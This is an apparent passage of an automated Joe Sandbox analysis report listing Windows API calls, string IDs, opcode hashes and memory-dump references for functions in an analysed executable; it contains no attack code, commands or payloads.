• IsMenu.USER32(?), ref: 00EC785C
• CreatePopupMenu.USER32 ref: 00EC7866
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC7893
• DrawMenuBar.USER32 ref: 00EC789B
Strings
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EC7B83
• CreateCompatibleDC.GDI32(00000000), ref: 00EC7B8A
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EC7B9D
• SelectObject.GDI32(00000000,00000000), ref: 00EC7BA5
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00EC7BB0
• DeleteDC.GDI32(00000000), ref: 00EC7BB9
• GetWindowLongW.USER32(?,000000EC), ref: 00EC7BC3
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EC7BD7
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EC7BE3
Strings
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
                                                                                                          • Opcode ID: e0551f74cbb6859b2579e2b3b5510381c1124e48c698bc4ed5494f0e7f5566c6
                                                                                                          • Instruction ID: 085ce2b0298d8a82b7b260b45b6b2a383a4b82ac2b422f5c8c4a43dfc0242144
                                                                                                          • Instruction Fuzzy Hash: B5318C32105218AFDF119F65EC49FDB3B6AFF09364F14121AFA55B61A0C732D825DBA0
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00E6706B
                                                                                                            • Part of subcall function 00E68D58: __getptd_noexit.LIBCMT ref: 00E68D58
                                                                                                          • __gmtime64_s.LIBCMT ref: 00E67104
                                                                                                          • __gmtime64_s.LIBCMT ref: 00E6713A
                                                                                                          • __gmtime64_s.LIBCMT ref: 00E67157
                                                                                                          • __allrem.LIBCMT ref: 00E671AD
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E671C9
                                                                                                          • __allrem.LIBCMT ref: 00E671E0
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E671FE
                                                                                                          • __allrem.LIBCMT ref: 00E67215
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E67233
                                                                                                          • __invoke_watson.LIBCMT ref: 00E672A4
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 384356119-0
                                                                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                          • Instruction ID: c7ce95d4fdab2a6288ec9bde50fe2fc2d35f33d14d6ae373df2c05e6072b1037
                                                                                                          • Instruction Fuzzy Hash: 69712BB1A84707ABE7149F79EC41B5AB3E8AF013A8F14922AF554F72C2E770DD408790
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EA2CE9
                                                                                                          • GetMenuItemInfoW.USER32(00F07890,000000FF,00000000,00000030), ref: 00EA2D4A
                                                                                                          • SetMenuItemInfoW.USER32(00F07890,00000004,00000000,00000030), ref: 00EA2D80
                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00EA2D92
                                                                                                          • GetMenuItemCount.USER32(?), ref: 00EA2DD6
                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00EA2DF2
                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00EA2E1C
                                                                                                          • GetMenuItemID.USER32(?,?), ref: 00EA2E61
                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EA2EA7
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA2EBB
                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA2EDC
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4176008265-0
                                                                                                          • Opcode ID: 406e899d3b0554d9bba4bcc2e637d18f8d72bd5e57f046ce238ace46fa3f941d
                                                                                                          • Instruction ID: abf171e74037720807d7d51a572be22e489bbba5d273799dbd45a24645129468
                                                                                                          • Instruction Fuzzy Hash: CE61A170900249AFDB22DF68DC84ABEBBB8EB4A308F14905DF941BB251D731BD45DB20
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EC75CA
                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EC75CD
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC75F1
                                                                                                          • _memset.LIBCMT ref: 00EC7602
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EC7614
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EC768C
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 830647256-0
                                                                                                          • Opcode ID: 50e26af5242f1305801581fcb4230c567f26f3776a7253b5537388fd4d918635
                                                                                                          • Instruction ID: 47d3daaa91c190b8727a9454e9f0d72103576b1110d6e280b7a14e5ce1cc6f74
                                                                                                          • Instruction Fuzzy Hash: 45617774904208AFDB10DFA8CD85FEE77F8AB09704F10419AFA54A72A1C771AE42DF60
                                                                                                          APIs
                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E977DD
                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00E97836
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00E97848
                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E97868
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00E978BB
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E978CF
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E978E4
                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00E978F1
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E978FA
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E9790C
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E97917
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2706829360-0
                                                                                                          • Opcode ID: 55a7f3af03a5d0406d44a4eb647ad860af3140e50f7ac778e418d7121f2e28a0
                                                                                                          • Instruction ID: 264e30555a00ae9745207ae2c8a9454042de000a722012a2f0ab73280ed50c92
                                                                                                          • Instruction Fuzzy Hash: 97416335A00119AFCF04DFA5D848EEDBBB9FF48344F05806AE955B7261C730A949CFA0
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 00EA0530
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00EA05B1
                                                                                                          • GetKeyState.USER32(000000A0), ref: 00EA05CC
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00EA05E6
                                                                                                          • GetKeyState.USER32(000000A1), ref: 00EA05FB
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00EA0613
                                                                                                          • GetKeyState.USER32(00000011), ref: 00EA0625
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00EA063D
                                                                                                          • GetKeyState.USER32(00000012), ref: 00EA064F
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00EA0667
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00EA0679
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: cf0b107c7a7c5858671e12290199129a06a43bc07914de64f7b1d729e0076da7
                                                                                                          • Instruction ID: 9086cda3de8d7534dfcf871655ebef095dbdcb083f0e70e4e6a12490cb979e57
                                                                                                          • Instruction Fuzzy Hash: 8F41EA309047C95DFF31866498043B5BFA0AB9B34CF08615AD9C56F5C1EB94B9D8CF92
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • CoInitialize.OLE32 ref: 00EB8AED
                                                                                                          • CoUninitialize.OLE32 ref: 00EB8AF8
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00ED3BBC,?), ref: 00EB8B58
                                                                                                          • IIDFromString.OLE32(?,?), ref: 00EB8BCB
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB8C65
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB8CC6
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                          • API String ID: 834269672-1287834457
                                                                                                          • Opcode ID: 5c6d5b0dce061735381c16e7d210e056da25e92f983d52b9b06b0ff68d4a578f
                                                                                                          • Instruction ID: d5c316772036e189b3c5d8249663e4c2bd63c47fb3c1df46409c856a8c74bd7e
                                                                                                          • Instruction Fuzzy Hash: A261AFB42057019FC710DF64DA89BABBBE8EF45714F142809F581AB391CB70ED48CBA2
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00EABB13
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EABB89
                                                                                                          • GetLastError.KERNEL32 ref: 00EABB93
                                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00EABC00
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                          • API String ID: 4194297153-14809454
                                                                                                          • Opcode ID: 9867e155910909dad0511ed72087417954200d37a6620093a4bc6defba5a8d6b
                                                                                                          • Instruction ID: c40b61e162ad4fafef71116b45f627a9ff928af3604689807b286512ae6f94dd
                                                                                                          • Opcode Fuzzy Hash: 9867e155910909dad0511ed72087417954200d37a6620093a4bc6defba5a8d6b
                                                                                                          • Instruction Fuzzy Hash: AE31A335A002089FCB10EF65C845FF9B7B4EF4A304F14515AE905FB2D6DB71A945CB60
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E99BCC
                                                                                                          • GetDlgCtrlID.USER32 ref: 00E99BD7
                                                                                                          • GetParent.USER32 ref: 00E99BF3
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E99BF6
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00E99BFF
                                                                                                          • GetParent.USER32(?), ref: 00E99C1B
                                                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E99C1E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 1536045017-1403004172
                                                                                                          • Opcode ID: c5cd1984ffee36ddcecafbf2978a2518e22f4d8803b865f1bb4bd2127ebca3eb
                                                                                                          • Instruction ID: 326858163abb2616eb1214aa14b5ccb3f10024e8cab9769872242f78467b2aa7
                                                                                                          • Opcode Fuzzy Hash: c5cd1984ffee36ddcecafbf2978a2518e22f4d8803b865f1bb4bd2127ebca3eb
                                                                                                          • Instruction Fuzzy Hash: 8F21F174901108AFDF04EBA5DC85EFEBBB4EF95300F10125AF961B72D2EB358818DA20
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB8FC1
                                                                                                          • CoInitialize.OLE32(00000000), ref: 00EB8FEE
                                                                                                          • CoUninitialize.OLE32 ref: 00EB8FF8
                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00EB90F8
                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EB9225
                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00ED3BDC), ref: 00EB9259
                                                                                                          • CoGetObject.OLE32(?,00000000,00ED3BDC,?), ref: 00EB927C
                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB928F
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EB930F
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB931F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2395222682-0
                                                                                                          • Opcode ID: 668f2dd885df5c18c477b5670e70582312bf368f501bd3b5e39a040a9596b4d9
                                                                                                          • Instruction ID: e4b2b56e32059848f4f1ee52499902b1db8d42352be5216f879c7d4dc5a4963a
                                                                                                          • Opcode Fuzzy Hash: 668f2dd885df5c18c477b5670e70582312bf368f501bd3b5e39a040a9596b4d9
                                                                                                          • Instruction Fuzzy Hash: 4DC14971604305AFC704DF68D884AABB7E9FF89348F00591DF689AB262DB71ED05CB52
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00EA19EF
                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A03
                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00EA1A0A
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A19
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA1A2B
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A44
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A56
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1A9B
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1AB0
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00EA0A67,?,00000001), ref: 00EA1ABB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                          • String ID:
                                                                                                          • API String ID: 2156557900-0
                                                                                                          • Opcode ID: 07fcf77d1d79deaf712d834ce64ecaba0e33f39585738251feb140fde54bb2a7
                                                                                                          • Instruction ID: dbf593698c0566218197d085828629f64d0c0b0b586bab30075a018d82600de2
                                                                                                          • Opcode Fuzzy Hash: 07fcf77d1d79deaf712d834ce64ecaba0e33f39585738251feb140fde54bb2a7
                                                                                                          • Instruction Fuzzy Hash: FD31E471606209BFDB10DF25EC44FA977AAFB5A39AF144196F900EE190DB74AD408F50
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000008), ref: 00E4260D
                                                                                                          • SetTextColor.GDI32(?,000000FF), ref: 00E42617
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00E4262C
                                                                                                          • GetStockObject.GDI32(00000005), ref: 00E42634
                                                                                                          • GetClientRect.USER32(?), ref: 00E7C0FC
                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E7C113
                                                                                                          • GetWindowDC.USER32(?), ref: 00E7C11F
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00E7C12E
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00E7C140
                                                                                                          • GetSysColor.USER32(00000005), ref: 00E7C15E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3430376129-0
                                                                                                          • Opcode ID: b616e7623708f022677ffa4a8cd08b3497739335a98e21736cb0cfa5f837f8b4
                                                                                                          • Instruction ID: aff0b151c0558c44ee8c4e246a2b0fdbf7f9496197b0d83ec4d97163eaf65057
                                                                                                          • Opcode Fuzzy Hash: b616e7623708f022677ffa4a8cd08b3497739335a98e21736cb0cfa5f837f8b4
                                                                                                          • Instruction Fuzzy Hash: 46117C31502205BFDB615FB5FC08BE97BB5EB08321F5842A6FA69A50E1CB310955EF11
                                                                                                          APIs
                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E4ADE1
                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 00E4AE80
                                                                                                          • UnregisterHotKey.USER32(?), ref: 00E4AFD7
                                                                                                          • DestroyWindow.USER32(?), ref: 00E82F64
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00E82FC9
                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E82FF6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                          • String ID: close all
                                                                                                          • API String ID: 469580280-3243417748
                                                                                                          • Opcode ID: 832f56d9d2c9ccd469cc4adf0aa526a4a6c602235978a2bef4232da7a2677883
                                                                                                          • Instruction ID: 8d3b0fb4b65413c64697bdb2ebdb0019e9f770fa85081ae8894c4241c38b9713
                                                                                                          • Opcode Fuzzy Hash: 832f56d9d2c9ccd469cc4adf0aa526a4a6c602235978a2bef4232da7a2677883
                                                                                                          • Instruction Fuzzy Hash: 1DA16D707422128FCB29EF20D494B69F3A5EF04754F1462ADE90EBB261CB31AD56CF91
                                                                                                          APIs
                                                                                                          • EnumChildWindows.USER32(?,00E9B13A), ref: 00E9B078
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChildEnumWindows
                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                          • API String ID: 3555792229-1603158881
                                                                                                          • Opcode ID: 103c65def5be9a6cbe9323e72bf9f896e7d444a6ea8c54e64eb4316651944856
                                                                                                          • Instruction ID: 59f39dff50d97c372f7aacadb249b063744f5f1707c159e65dd900825616cdc0
                                                                                                          • Opcode Fuzzy Hash: 103c65def5be9a6cbe9323e72bf9f896e7d444a6ea8c54e64eb4316651944856
                                                                                                          • Instruction Fuzzy Hash: B4919F70600215EACF08EF60D482BEEFBB5BF04344F18A129E95AB7251DF306999DBD1
                                                                                                          APIs
                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00E4327E
                                                                                                            • Part of subcall function 00E4218F: GetClientRect.USER32(?,?), ref: 00E421B8
                                                                                                            • Part of subcall function 00E4218F: GetWindowRect.USER32(?,?), ref: 00E421F9
                                                                                                            • Part of subcall function 00E4218F: ScreenToClient.USER32(?,?), ref: 00E42221
                                                                                                          • GetDC.USER32 ref: 00E7D073
                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E7D086
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00E7D094
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00E7D0A9
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00E7D0B1
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E7D13C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                          • String ID: U
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                            • Part of subcall function 00E42714: GetCursorPos.USER32(?), ref: 00E42727
                                                                                                            • Part of subcall function 00E42714: ScreenToClient.USER32(00F077B0,?), ref: 00E42744
                                                                                                            • Part of subcall function 00E42714: GetAsyncKeyState.USER32(00000001), ref: 00E42769
                                                                                                            • Part of subcall function 00E42714: GetAsyncKeyState.USER32(00000002), ref: 00E42777
                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00ECC69C
                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00ECC6A2
                                                                                                          • ReleaseCapture.USER32 ref: 00ECC6A8
                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00ECC752
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00ECC765
                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00ECC847
                                                                                                          Similarity
                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                          APIs
                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EB211C
                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EB2148
                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EB218A
                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EB219F
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EB21AC
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EB21DC
                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00EB2223
                                                                                                            • Part of subcall function 00EB2B4F: GetLastError.KERNEL32(?,?,00EB1EE3,00000000,00000000,00000001), ref: 00EB2B64
                                                                                                            • Part of subcall function 00EB2B4F: SetEvent.KERNEL32(?,?,00EB1EE3,00000000,00000000,00000001), ref: 00EB2B79
                                                                                                          Similarity
                                                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                          APIs
                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00ED0980), ref: 00EB9412
                                                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00ED0980), ref: 00EB9446
                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EB95C0
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00EB95EA
                                                                                                          Similarity
                                                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EA3B8A,?), ref: 00EA4BE0
                                                                                                            • Part of subcall function 00EA4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EA3B8A,?), ref: 00EA4BF9
                                                                                                            • Part of subcall function 00EA4FEC: GetFileAttributesW.KERNEL32(?,00EA3BFE), ref: 00EA4FED
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00EA52FB
                                                                                                          • _wcscmp.LIBCMT ref: 00EA5315
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00EA5330
                                                                                                          Similarity
                                                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
